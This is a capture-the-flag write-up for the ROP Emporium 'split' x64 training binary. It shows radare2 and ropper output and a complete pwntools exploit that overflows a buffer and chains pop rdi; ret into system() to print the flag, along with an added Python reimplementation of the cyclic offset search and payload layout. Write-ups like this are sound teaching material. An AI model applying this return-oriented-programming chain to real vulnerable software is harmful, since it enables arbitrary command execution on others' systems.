ROP Emporium : Split
Hey folks!
Today we are gonna do another little ROP and hopefully learn a little about pwntools. The binary we are going to use is the x64 "Split" from ROP Emporium.
Let's start by enumerating the binary. I am going to load it in radare2 using r2, pass aaa to analyze all flags, and then look for interesting strings (if any) with izz.
With that out of the way, I list the functions inside the binary with the afl command; sym.usefulFunction and sym.main stand out, so I disassemble both with pdf.
root@karma:~/Desktop/exploitation/ROP-Emporium/split# r2 split
-- You are probably using an old version of r2, go checkout the git!
[0x00400650]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x00400650]> izz
vaddr=0x00400034 paddr=0x00000034 ordinal=000 sz=10 len=4 section=LOAD0 type=utf16le string=@8\t@
vaddr=0x00400238 paddr=0x00000238 ordinal=001 sz=28 len=27 section=.interp type=ascii string=/lib64/ld-linux-x86-64.so.2
vaddr=0x004003e9 paddr=0x000003e9 ordinal=002 sz=10 len=9 section=.dynstr type=ascii string=libc.so.6
vaddr=0x004003f3 paddr=0x000003f3 ordinal=003 sz=5 len=4 section=.dynstr type=ascii string=puts
vaddr=0x004003f8 paddr=0x000003f8 ordinal=004 sz=6 len=5 section=.dynstr type=ascii string=stdin
vaddr=0x004003fe paddr=0x000003fe ordinal=005 sz=7 len=6 section=.dynstr type=ascii string=printf
vaddr=0x00400405 paddr=0x00000405 ordinal=006 sz=6 len=5 section=.dynstr type=ascii string=fgets
vaddr=0x0040040b paddr=0x0000040b ordinal=007 sz=7 len=6 section=.dynstr type=ascii string=memset
vaddr=0x00400412 paddr=0x00000412 ordinal=008 sz=7 len=6 section=.dynstr type=ascii string=stdout
vaddr=0x00400419 paddr=0x00000419 ordinal=009 sz=7 len=6 section=.dynstr type=ascii string=stderr
vaddr=0x00400420 paddr=0x00000420 ordinal=010 sz=7 len=6 section=.dynstr type=ascii string=system
vaddr=0x00400427 paddr=0x00000427 ordinal=011 sz=8 len=7 section=.dynstr type=ascii string=setvbuf
vaddr=0x0040042f paddr=0x0000042f ordinal=012 sz=18 len=17 section=.dynstr type=ascii string=__libc_start_main
vaddr=0x00400441 paddr=0x00000441 ordinal=013 sz=15 len=14 section=.dynstr type=ascii string=__gmon_start__
vaddr=0x00400450 paddr=0x00000450 ordinal=014 sz=12 len=11 section=.dynstr type=ascii string=GLIBC_2.2.5
vaddr=0x004005c1 paddr=0x000005c1 ordinal=015 sz=5 len=4 section=.plt type=ascii string=5B\n
vaddr=0x004005c7 paddr=0x000005c7 ordinal=016 sz=5 len=4 section=.plt type=ascii string=%D\n
vaddr=0x004005d1 paddr=0x000005d1 ordinal=017 sz=5 len=4 section=.plt type=ascii string=%B\n
vaddr=0x004005e1 paddr=0x000005e1 ordinal=018 sz=5 len=4 section=.plt type=ascii string=%:\n
vaddr=0x004005f1 paddr=0x000005f1 ordinal=019 sz=5 len=4 section=.plt type=ascii string=%2\n
vaddr=0x00400601 paddr=0x00000601 ordinal=020 sz=5 len=4 section=.plt type=ascii string=%*\n
vaddr=0x00400611 paddr=0x00000611 ordinal=021 sz=5 len=4 section=.plt type=ascii string=%"\n
vaddr=0x00400820 paddr=0x00000820 ordinal=022 sz=6 len=5 section=.text type=ascii string=AWAVA
vaddr=0x00400827 paddr=0x00000827 ordinal=023 sz=6 len=5 section=.text type=ascii string=AUATL
vaddr=0x00400879 paddr=0x00000879 ordinal=024 sz=16 len=14 section=.text type=utf8 string=\b[]A\A]A^A_Ðf. blocks=Basic Latin,Latin-1 Supplement
vaddr=0x004008a8 paddr=0x000008a8 ordinal=025 sz=22 len=21 section=.rodata type=ascii string=split by ROP Emporium
vaddr=0x004008be paddr=0x000008be ordinal=026 sz=8 len=7 section=.rodata type=ascii string=64bits\n
vaddr=0x004008c6 paddr=0x000008c6 ordinal=027 sz=9 len=8 section=.rodata type=ascii string=\nExiting
vaddr=0x004008d0 paddr=0x000008d0 ordinal=028 sz=44 len=43 section=.rodata type=ascii string=Contriving a reason to ask user for data...
vaddr=0x004008ff paddr=0x000008ff ordinal=029 sz=8 len=7 section=.rodata type=ascii string=/bin/ls
vaddr=0x00400960 paddr=0x00000960 ordinal=030 sz=5 len=4 section=.eh_frame type=ascii string=\e\f\a\b
vaddr=0x00400990 paddr=0x00000990 ordinal=031 sz=5 len=4 section=.eh_frame type=ascii string=\e\f\a\b
vaddr=0x004009b7 paddr=0x000009b7 ordinal=032 sz=6 len=5 section=.eh_frame type=ascii string=;*3$"
vaddr=0x004009da paddr=0x000009da ordinal=033 sz=5 len=4 section=.eh_frame type=ascii string=j\f\a\b
vaddr=0x004009fa paddr=0x000009fa ordinal=034 sz=5 len=4 section=.eh_frame type=ascii string=M\f\a\b
vaddr=0x00400a19 paddr=0x00000a19 ordinal=035 sz=5 len=4 section=.eh_frame type=ascii string=L\f\a\b
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
vaddr=0x00000000 paddr=0x0000107a ordinal=037 sz=52 len=51 section=.comment type=ascii string=GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
vaddr=0x00000001 paddr=0x00001801 ordinal=038 sz=11 len=10 section=.strtab type=ascii string=crtstuff.c
vaddr=0x0000000c paddr=0x0000180c ordinal=039 sz=13 len=12 section=.strtab type=ascii string=__JCR_LIST__
vaddr=0x00000019 paddr=0x00001819 ordinal=040 sz=21 len=20 section=.strtab type=ascii string=deregister_tm_clones
vaddr=0x0000002e paddr=0x0000182e ordinal=041 sz=22 len=21 section=.strtab type=ascii string=__do_global_dtors_aux
vaddr=0x00000044 paddr=0x00001844 ordinal=042 sz=15 len=14 section=.strtab type=ascii string=completed.7585
vaddr=0x00000053 paddr=0x00001853 ordinal=043 sz=39 len=38 section=.strtab type=ascii string=__do_global_dtors_aux_fini_array_entry
vaddr=0x0000007a paddr=0x0000187a ordinal=044 sz=12 len=11 section=.strtab type=ascii string=frame_dummy
vaddr=0x00000086 paddr=0x00001886 ordinal=045 sz=31 len=30 section=.strtab type=ascii string=__frame_dummy_init_array_entry
vaddr=0x000000a5 paddr=0x000018a5 ordinal=046 sz=8 len=7 section=.strtab type=ascii string=split.c
vaddr=0x000000ad paddr=0x000018ad ordinal=047 sz=6 len=5 section=.strtab type=ascii string=pwnme
vaddr=0x000000b3 paddr=0x000018b3 ordinal=048 sz=15 len=14 section=.strtab type=ascii string=usefulFunction
vaddr=0x000000c2 paddr=0x000018c2 ordinal=049 sz=14 len=13 section=.strtab type=ascii string=__FRAME_END__
vaddr=0x000000d0 paddr=0x000018d0 ordinal=050 sz=12 len=11 section=.strtab type=ascii string=__JCR_END__
vaddr=0x000000dc paddr=0x000018dc ordinal=051 sz=17 len=16 section=.strtab type=ascii string=__init_array_end
vaddr=0x000000ed paddr=0x000018ed ordinal=052 sz=9 len=8 section=.strtab type=ascii string=_DYNAMIC
vaddr=0x000000f6 paddr=0x000018f6 ordinal=053 sz=19 len=18 section=.strtab type=ascii string=__init_array_start
vaddr=0x00000109 paddr=0x00001909 ordinal=054 sz=19 len=18 section=.strtab type=ascii string=__GNU_EH_FRAME_HDR
vaddr=0x0000011c paddr=0x0000191c ordinal=055 sz=22 len=21 section=.strtab type=ascii string=_GLOBAL_OFFSET_TABLE_
vaddr=0x00000132 paddr=0x00001932 ordinal=056 sz=16 len=15 section=.strtab type=ascii string=__libc_csu_fini
vaddr=0x00000142 paddr=0x00001942 ordinal=057 sz=28 len=27 section=.strtab type=ascii string=_ITM_deregisterTMCloneTable
vaddr=0x0000015e paddr=0x0000195e ordinal=058 sz=20 len=19 section=.strtab type=ascii string=stdout@@GLIBC_2.2.5
vaddr=0x00000172 paddr=0x00001972 ordinal=059 sz=18 len=17 section=.strtab type=ascii string=puts@@GLIBC_2.2.5
vaddr=0x00000184 paddr=0x00001984 ordinal=060 sz=19 len=18 section=.strtab type=ascii string=stdin@@GLIBC_2.2.5
vaddr=0x00000197 paddr=0x00001997 ordinal=061 sz=7 len=6 section=.strtab type=ascii string=_edata
vaddr=0x0000019e paddr=0x0000199e ordinal=062 sz=20 len=19 section=.strtab type=ascii string=system@@GLIBC_2.2.5
vaddr=0x000001b2 paddr=0x000019b2 ordinal=063 sz=20 len=19 section=.strtab type=ascii string=printf@@GLIBC_2.2.5
vaddr=0x000001c6 paddr=0x000019c6 ordinal=064 sz=20 len=19 section=.strtab type=ascii string=memset@@GLIBC_2.2.5
vaddr=0x000001da paddr=0x000019da ordinal=065 sz=31 len=30 section=.strtab type=ascii string=__libc_start_main@@GLIBC_2.2.5
vaddr=0x000001f9 paddr=0x000019f9 ordinal=066 sz=19 len=18 section=.strtab type=ascii string=fgets@@GLIBC_2.2.5
vaddr=0x0000020c paddr=0x00001a0c ordinal=067 sz=13 len=12 section=.strtab type=ascii string=__data_start
vaddr=0x00000219 paddr=0x00001a19 ordinal=068 sz=15 len=14 section=.strtab type=ascii string=__gmon_start__
vaddr=0x00000228 paddr=0x00001a28 ordinal=069 sz=13 len=12 section=.strtab type=ascii string=__dso_handle
vaddr=0x00000235 paddr=0x00001a35 ordinal=070 sz=15 len=14 section=.strtab type=ascii string=_IO_stdin_used
vaddr=0x00000244 paddr=0x00001a44 ordinal=071 sz=13 len=12 section=.strtab type=ascii string=usefulString
vaddr=0x00000251 paddr=0x00001a51 ordinal=072 sz=16 len=15 section=.strtab type=ascii string=__libc_csu_init
vaddr=0x00000261 paddr=0x00001a61 ordinal=073 sz=12 len=11 section=.strtab type=ascii string=__bss_start
vaddr=0x0000026d paddr=0x00001a6d ordinal=074 sz=5 len=4 section=.strtab type=ascii string=main
vaddr=0x00000272 paddr=0x00001a72 ordinal=075 sz=21 len=20 section=.strtab type=ascii string=setvbuf@@GLIBC_2.2.5
vaddr=0x00000287 paddr=0x00001a87 ordinal=076 sz=20 len=19 section=.strtab type=ascii string=_Jv_RegisterClasses
vaddr=0x0000029b paddr=0x00001a9b ordinal=077 sz=12 len=11 section=.strtab type=ascii string=__TMC_END__
vaddr=0x000002a7 paddr=0x00001aa7 ordinal=078 sz=26 len=25 section=.strtab type=ascii string=_ITM_registerTMCloneTable
vaddr=0x000002c1 paddr=0x00001ac1 ordinal=079 sz=20 len=19 section=.strtab type=ascii string=stderr@@GLIBC_2.2.5
vaddr=0x00000001 paddr=0x00001ad6 ordinal=080 sz=8 len=7 section=.shstrtab type=ascii string=.symtab
vaddr=0x00000009 paddr=0x00001ade ordinal=081 sz=8 len=7 section=.shstrtab type=ascii string=.strtab
vaddr=0x00000011 paddr=0x00001ae6 ordinal=082 sz=10 len=9 section=.shstrtab type=ascii string=.shstrtab
vaddr=0x0000001b paddr=0x00001af0 ordinal=083 sz=8 len=7 section=.shstrtab type=ascii string=.interp
vaddr=0x00000023 paddr=0x00001af8 ordinal=084 sz=14 len=13 section=.shstrtab type=ascii string=.note.ABI-tag
vaddr=0x00000031 paddr=0x00001b06 ordinal=085 sz=19 len=18 section=.shstrtab type=ascii string=.note.gnu.build-id
vaddr=0x00000044 paddr=0x00001b19 ordinal=086 sz=10 len=9 section=.shstrtab type=ascii string=.gnu.hash
vaddr=0x0000004e paddr=0x00001b23 ordinal=087 sz=8 len=7 section=.shstrtab type=ascii string=.dynsym
vaddr=0x00000056 paddr=0x00001b2b ordinal=088 sz=8 len=7 section=.shstrtab type=ascii string=.dynstr
vaddr=0x0000005e paddr=0x00001b33 ordinal=089 sz=13 len=12 section=.shstrtab type=ascii string=.gnu.version
vaddr=0x0000006b paddr=0x00001b40 ordinal=090 sz=15 len=14 section=.shstrtab type=ascii string=.gnu.version_r
vaddr=0x0000007a paddr=0x00001b4f ordinal=091 sz=10 len=9 section=.shstrtab type=ascii string=.rela.dyn
vaddr=0x00000084 paddr=0x00001b59 ordinal=092 sz=10 len=9 section=.shstrtab type=ascii string=.rela.plt
vaddr=0x0000008e paddr=0x00001b63 ordinal=093 sz=6 len=5 section=.shstrtab type=ascii string=.init
vaddr=0x00000094 paddr=0x00001b69 ordinal=094 sz=9 len=8 section=.shstrtab type=ascii string=.plt.got
vaddr=0x0000009d paddr=0x00001b72 ordinal=095 sz=6 len=5 section=.shstrtab type=ascii string=.text
vaddr=0x000000a3 paddr=0x00001b78 ordinal=096 sz=6 len=5 section=.shstrtab type=ascii string=.fini
vaddr=0x000000a9 paddr=0x00001b7e ordinal=097 sz=8 len=7 section=.shstrtab type=ascii string=.rodata
vaddr=0x000000b1 paddr=0x00001b86 ordinal=098 sz=14 len=13 section=.shstrtab type=ascii string=.eh_frame_hdr
vaddr=0x000000bf paddr=0x00001b94 ordinal=099 sz=10 len=9 section=.shstrtab type=ascii string=.eh_frame
vaddr=0x000000c9 paddr=0x00001b9e ordinal=100 sz=12 len=11 section=.shstrtab type=ascii string=.init_array
vaddr=0x000000d5 paddr=0x00001baa ordinal=101 sz=12 len=11 section=.shstrtab type=ascii string=.fini_array
vaddr=0x000000e1 paddr=0x00001bb6 ordinal=102 sz=5 len=4 section=.shstrtab type=ascii string=.jcr
vaddr=0x000000e6 paddr=0x00001bbb ordinal=103 sz=9 len=8 section=.shstrtab type=ascii string=.dynamic
vaddr=0x000000ef paddr=0x00001bc4 ordinal=104 sz=9 len=8 section=.shstrtab type=ascii string=.got.plt
vaddr=0x000000f8 paddr=0x00001bcd ordinal=105 sz=6 len=5 section=.shstrtab type=ascii string=.data
vaddr=0x000000fe paddr=0x00001bd3 ordinal=106 sz=5 len=4 section=.shstrtab type=ascii string=.bss
vaddr=0x00000103 paddr=0x00001bd8 ordinal=107 sz=9 len=8 section=.shstrtab type=ascii string=.comment
So once you look closely you'll see this line in the .data section:
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
Let's take vaddr=0x00601060 and save it; the address of the "/bin/cat flag.txt" string is one of the important addresses we will need to build our ROP chain.
[0x00400650]> afl
0x00400048 1 164 fcn.00400048
0x004005a0 3 26 sym._init
0x004005d0 2 16 -> 32 sym.imp.puts
0x004005e0 2 16 -> 48 sym.imp.system
0x004005f0 2 16 -> 48 sym.imp.printf
0x00400600 2 16 -> 48 sym.imp.memset
0x00400610 2 16 -> 48 sym.imp.__libc_start_main
0x00400620 2 16 -> 48 sym.imp.fgets
0x00400630 2 16 -> 48 sym.imp.setvbuf
0x00400640 1 16 sub.__gmon_start___248_640
0x00400650 1 41 entry0
0x00400680 4 50 -> 41 sym.deregister_tm_clones
0x004006c0 3 53 sym.register_tm_clones
0x00400700 3 28 sym.__do_global_dtors_aux
0x00400720 4 38 -> 35 entry1.init
0x00400746 1 111 sym.main
0x004007b5 1 82 sym.pwnme
0x00400807 1 17 sym.usefulFunction
0x00400820 4 101 sym.__libc_csu_init
0x00400890 1 2 sym.__libc_csu_fini
0x00400894 1 9 sym._fini
[0x00400650]> pdf @ sym.main
;-- main:
/ (fcn) sym.main 111
| sym.main ();
| ; DATA XREF from 0x0040066d (entry0)
| 0x00400746 55 push rbp
| 0x00400747 4889e5 mov rbp, rsp
| 0x0040074a 488b052f0920. mov rax, qword [obj.stdout] ; [0x601080:8]=0
| 0x00400751 b900000000 mov ecx, 0
| 0x00400756 ba02000000 mov edx, 2
| 0x0040075b be00000000 mov esi, 0
| 0x00400760 4889c7 mov rdi, rax
| 0x00400763 e8c8feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char*buf, int mode, size_t size)
| 0x00400768 488b05310920. mov rax, qword [obj.stderr] ; [0x6010a0:8]=0
| 0x0040076f b900000000 mov ecx, 0
| 0x00400774 ba02000000 mov edx, 2
| 0x00400779 be00000000 mov esi, 0
| 0x0040077e 4889c7 mov rdi, rax
| 0x00400781 e8aafeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char*buf, int mode, size_t size)
| 0x00400786 bfa8084000 mov edi, str.split_by_ROP_Emporium ; 0x4008a8 ; "split by ROP Emporium"
| 0x0040078b e840feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n)
| 0x00400790 bfbe084000 mov edi, str.64bits_n ; 0x4008be ; "64bits\n"
| 0x00400795 e836feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n)
| 0x0040079a b800000000 mov eax, 0
| 0x0040079f e811000000 call sym.pwnme
| 0x004007a4 bfc6084000 mov edi, str._nExiting ; 0x4008c6 ; "\nExiting"
| 0x004007a9 e822feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n)
| 0x004007ae b800000000 mov eax, 0
| 0x004007b3 5d pop rbp
\ 0x004007b4 c3 ret
[0x00400650]> pdf @ sym.usefulFunction
/ (fcn) sym.usefulFunction 17
| sym.usefulFunction ();
| 0x00400807 55 push rbp
| 0x00400808 4889e5 mov rbp, rsp
| 0x0040080b bfff084000 mov edi, str._bin_ls ; 0x4008ff ; "/bin/ls"
| 0x00400810 e8cbfdffff call sym.imp.system ; int system(const char *string)
| 0x00400815 90 nop
| 0x00400816 5d pop rbp
\ 0x00400817 c3 ret
[0x00400650]>
Now, as in the snippet above, I took the address of the call to system from usefulFunction, i.e. the call sym.imp.system instruction at
0x00400810
usefulFunction only ever calls system with "/bin/ls", so returning to this instruction with rdi already pointing at our own string is what makes the chain useful. The remaining piece is a gadget that loads rdi from the stack, which I searched for with ropper:
root@karma:~/Desktop/exploitation/ROP-Emporium/split# ropper --file split --search "pop rdi;"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi;
[INFO] File: split
0x0000000000400883: pop rdi; ret;
So now we have the final element, and we can start building our exploit.
Once complete, the exploit looks like this; refer to the comments to get started with pwntools.
from pwn import *

# set the binary which is meant to be used
elf = context.binary = ELF('split')
# turn on debug logging to get info that's handy while debugging
context.log_level = 'DEBUG'
# address of the "/bin/cat flag.txt" string, obtained via izz
address = 0x00601060
# 0x00400810: the call to system inside usefulFunction
# (named sys_call so it does not shadow the sys module pulled in by pwn)
sys_call = 0x400810
# 0x0000000000400883: pop rdi; ret, found with ropper
pop_rdi = 0x400883

# start the process once to find the buffer size
io = process(elf.path)
# send the cyclic pattern
io.sendline(cyclic(128))
# wait for the binary to crash
io.wait()
# open the core file
core = io.corefile
# get the RSP at the time of the crash
stack = core.rsp
# read the 4 bytes at RSP: the slice of the pattern that overwrote the return address
pattern = core.read(stack, 4)
# get the offset of the return address (the BUF size plus saved rbp)
size = cyclic_find(pattern)

# set up the ROP chain; the flow goes pop rdi; ret -> address (via izz) -> call system
# p64 packs each address as a little-endian 64-bit value
rop = p64(pop_rdi, endian="little")
rop += p64(address, endian="little")
rop += p64(sys_call, endian="little")
# set up the padding by using the offset found with the cyclic pattern
padding = cyclic(size)
payload = padding + rop

# restart the process and send the ROP payload
io = process(elf.path)
io.sendline(payload)
io.wait_for_close()
# recvall drains whatever the process printed before it closed
print(io.recvall())
print("Thank You, Exploit By Karma")
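To make the two pwntools steps concrete (how cyclic_find turns the 4 bytes read at RSP into an offset, and what the padding + pop rdi; ret + string + call-system layout looks like in memory), here is an added example that is not part of the original post. It reimplements cyclic()/cyclic_find() on the same lowercase de Bruijn alphabet pwntools uses and lays out the chain with the post's addresses; the offset of 40 is an assumed demo value standing in for whatever core.rsp lookup returns on the real binary.

```python
import string
import struct
from itertools import islice

# addresses taken from the post: gadget (ropper), string (izz), call site (pdf)
POP_RDI_RET = 0x400883   # pop rdi; ret
CAT_FLAG    = 0x601060   # "/bin/cat flag.txt" in .data
CALL_SYSTEM = 0x400810   # call sym.imp.system inside usefulFunction


def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Yield the de Bruijn sequence B(k, n): every n-gram occurs exactly once,
    which is why 4 bytes at RSP are enough to locate the offset."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern (same start as pwntools: aaaabaaac...)."""
    return "".join(islice(de_bruijn(), length)).encode()


def cyclic_find(subseq, max_len=1 << 16):
    """Offset of a 4-byte slice within the pattern, or -1 if absent."""
    return cyclic(max_len).find(subseq)


def p64(value):
    return struct.pack("<Q", value)


def build_payload(offset):
    """Padding up to the saved return address, then the three-qword chain."""
    chain = p64(POP_RDI_RET) + p64(CAT_FLAG) + p64(CALL_SYSTEM)
    return cyclic(offset) + chain


def chain_from_payload(payload, offset):
    """Decode the qwords after the padding to check the layout on the stack."""
    return [struct.unpack("<Q", payload[i:i + 8])[0]
            for i in range(offset, len(payload), 8)]


if __name__ == "__main__":
    crash_bytes = cyclic(128)[40:44]          # constructed: what core.read(rsp, 4) returns
    offset = cyclic_find(crash_bytes)         # -> 40
    print(offset, [hex(q) for q in chain_from_payload(build_payload(offset), offset)])
```

The decoded chain reads, in stack order, pop rdi; ret, then the string address that pop rdi consumes, then the call instruction that ret lands on, which is exactly the order the post's script packs them.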
So that's how manual ROP works. I will be posting the fully automated ROP for split and an automated BoF for ret2win next!
Thank You!!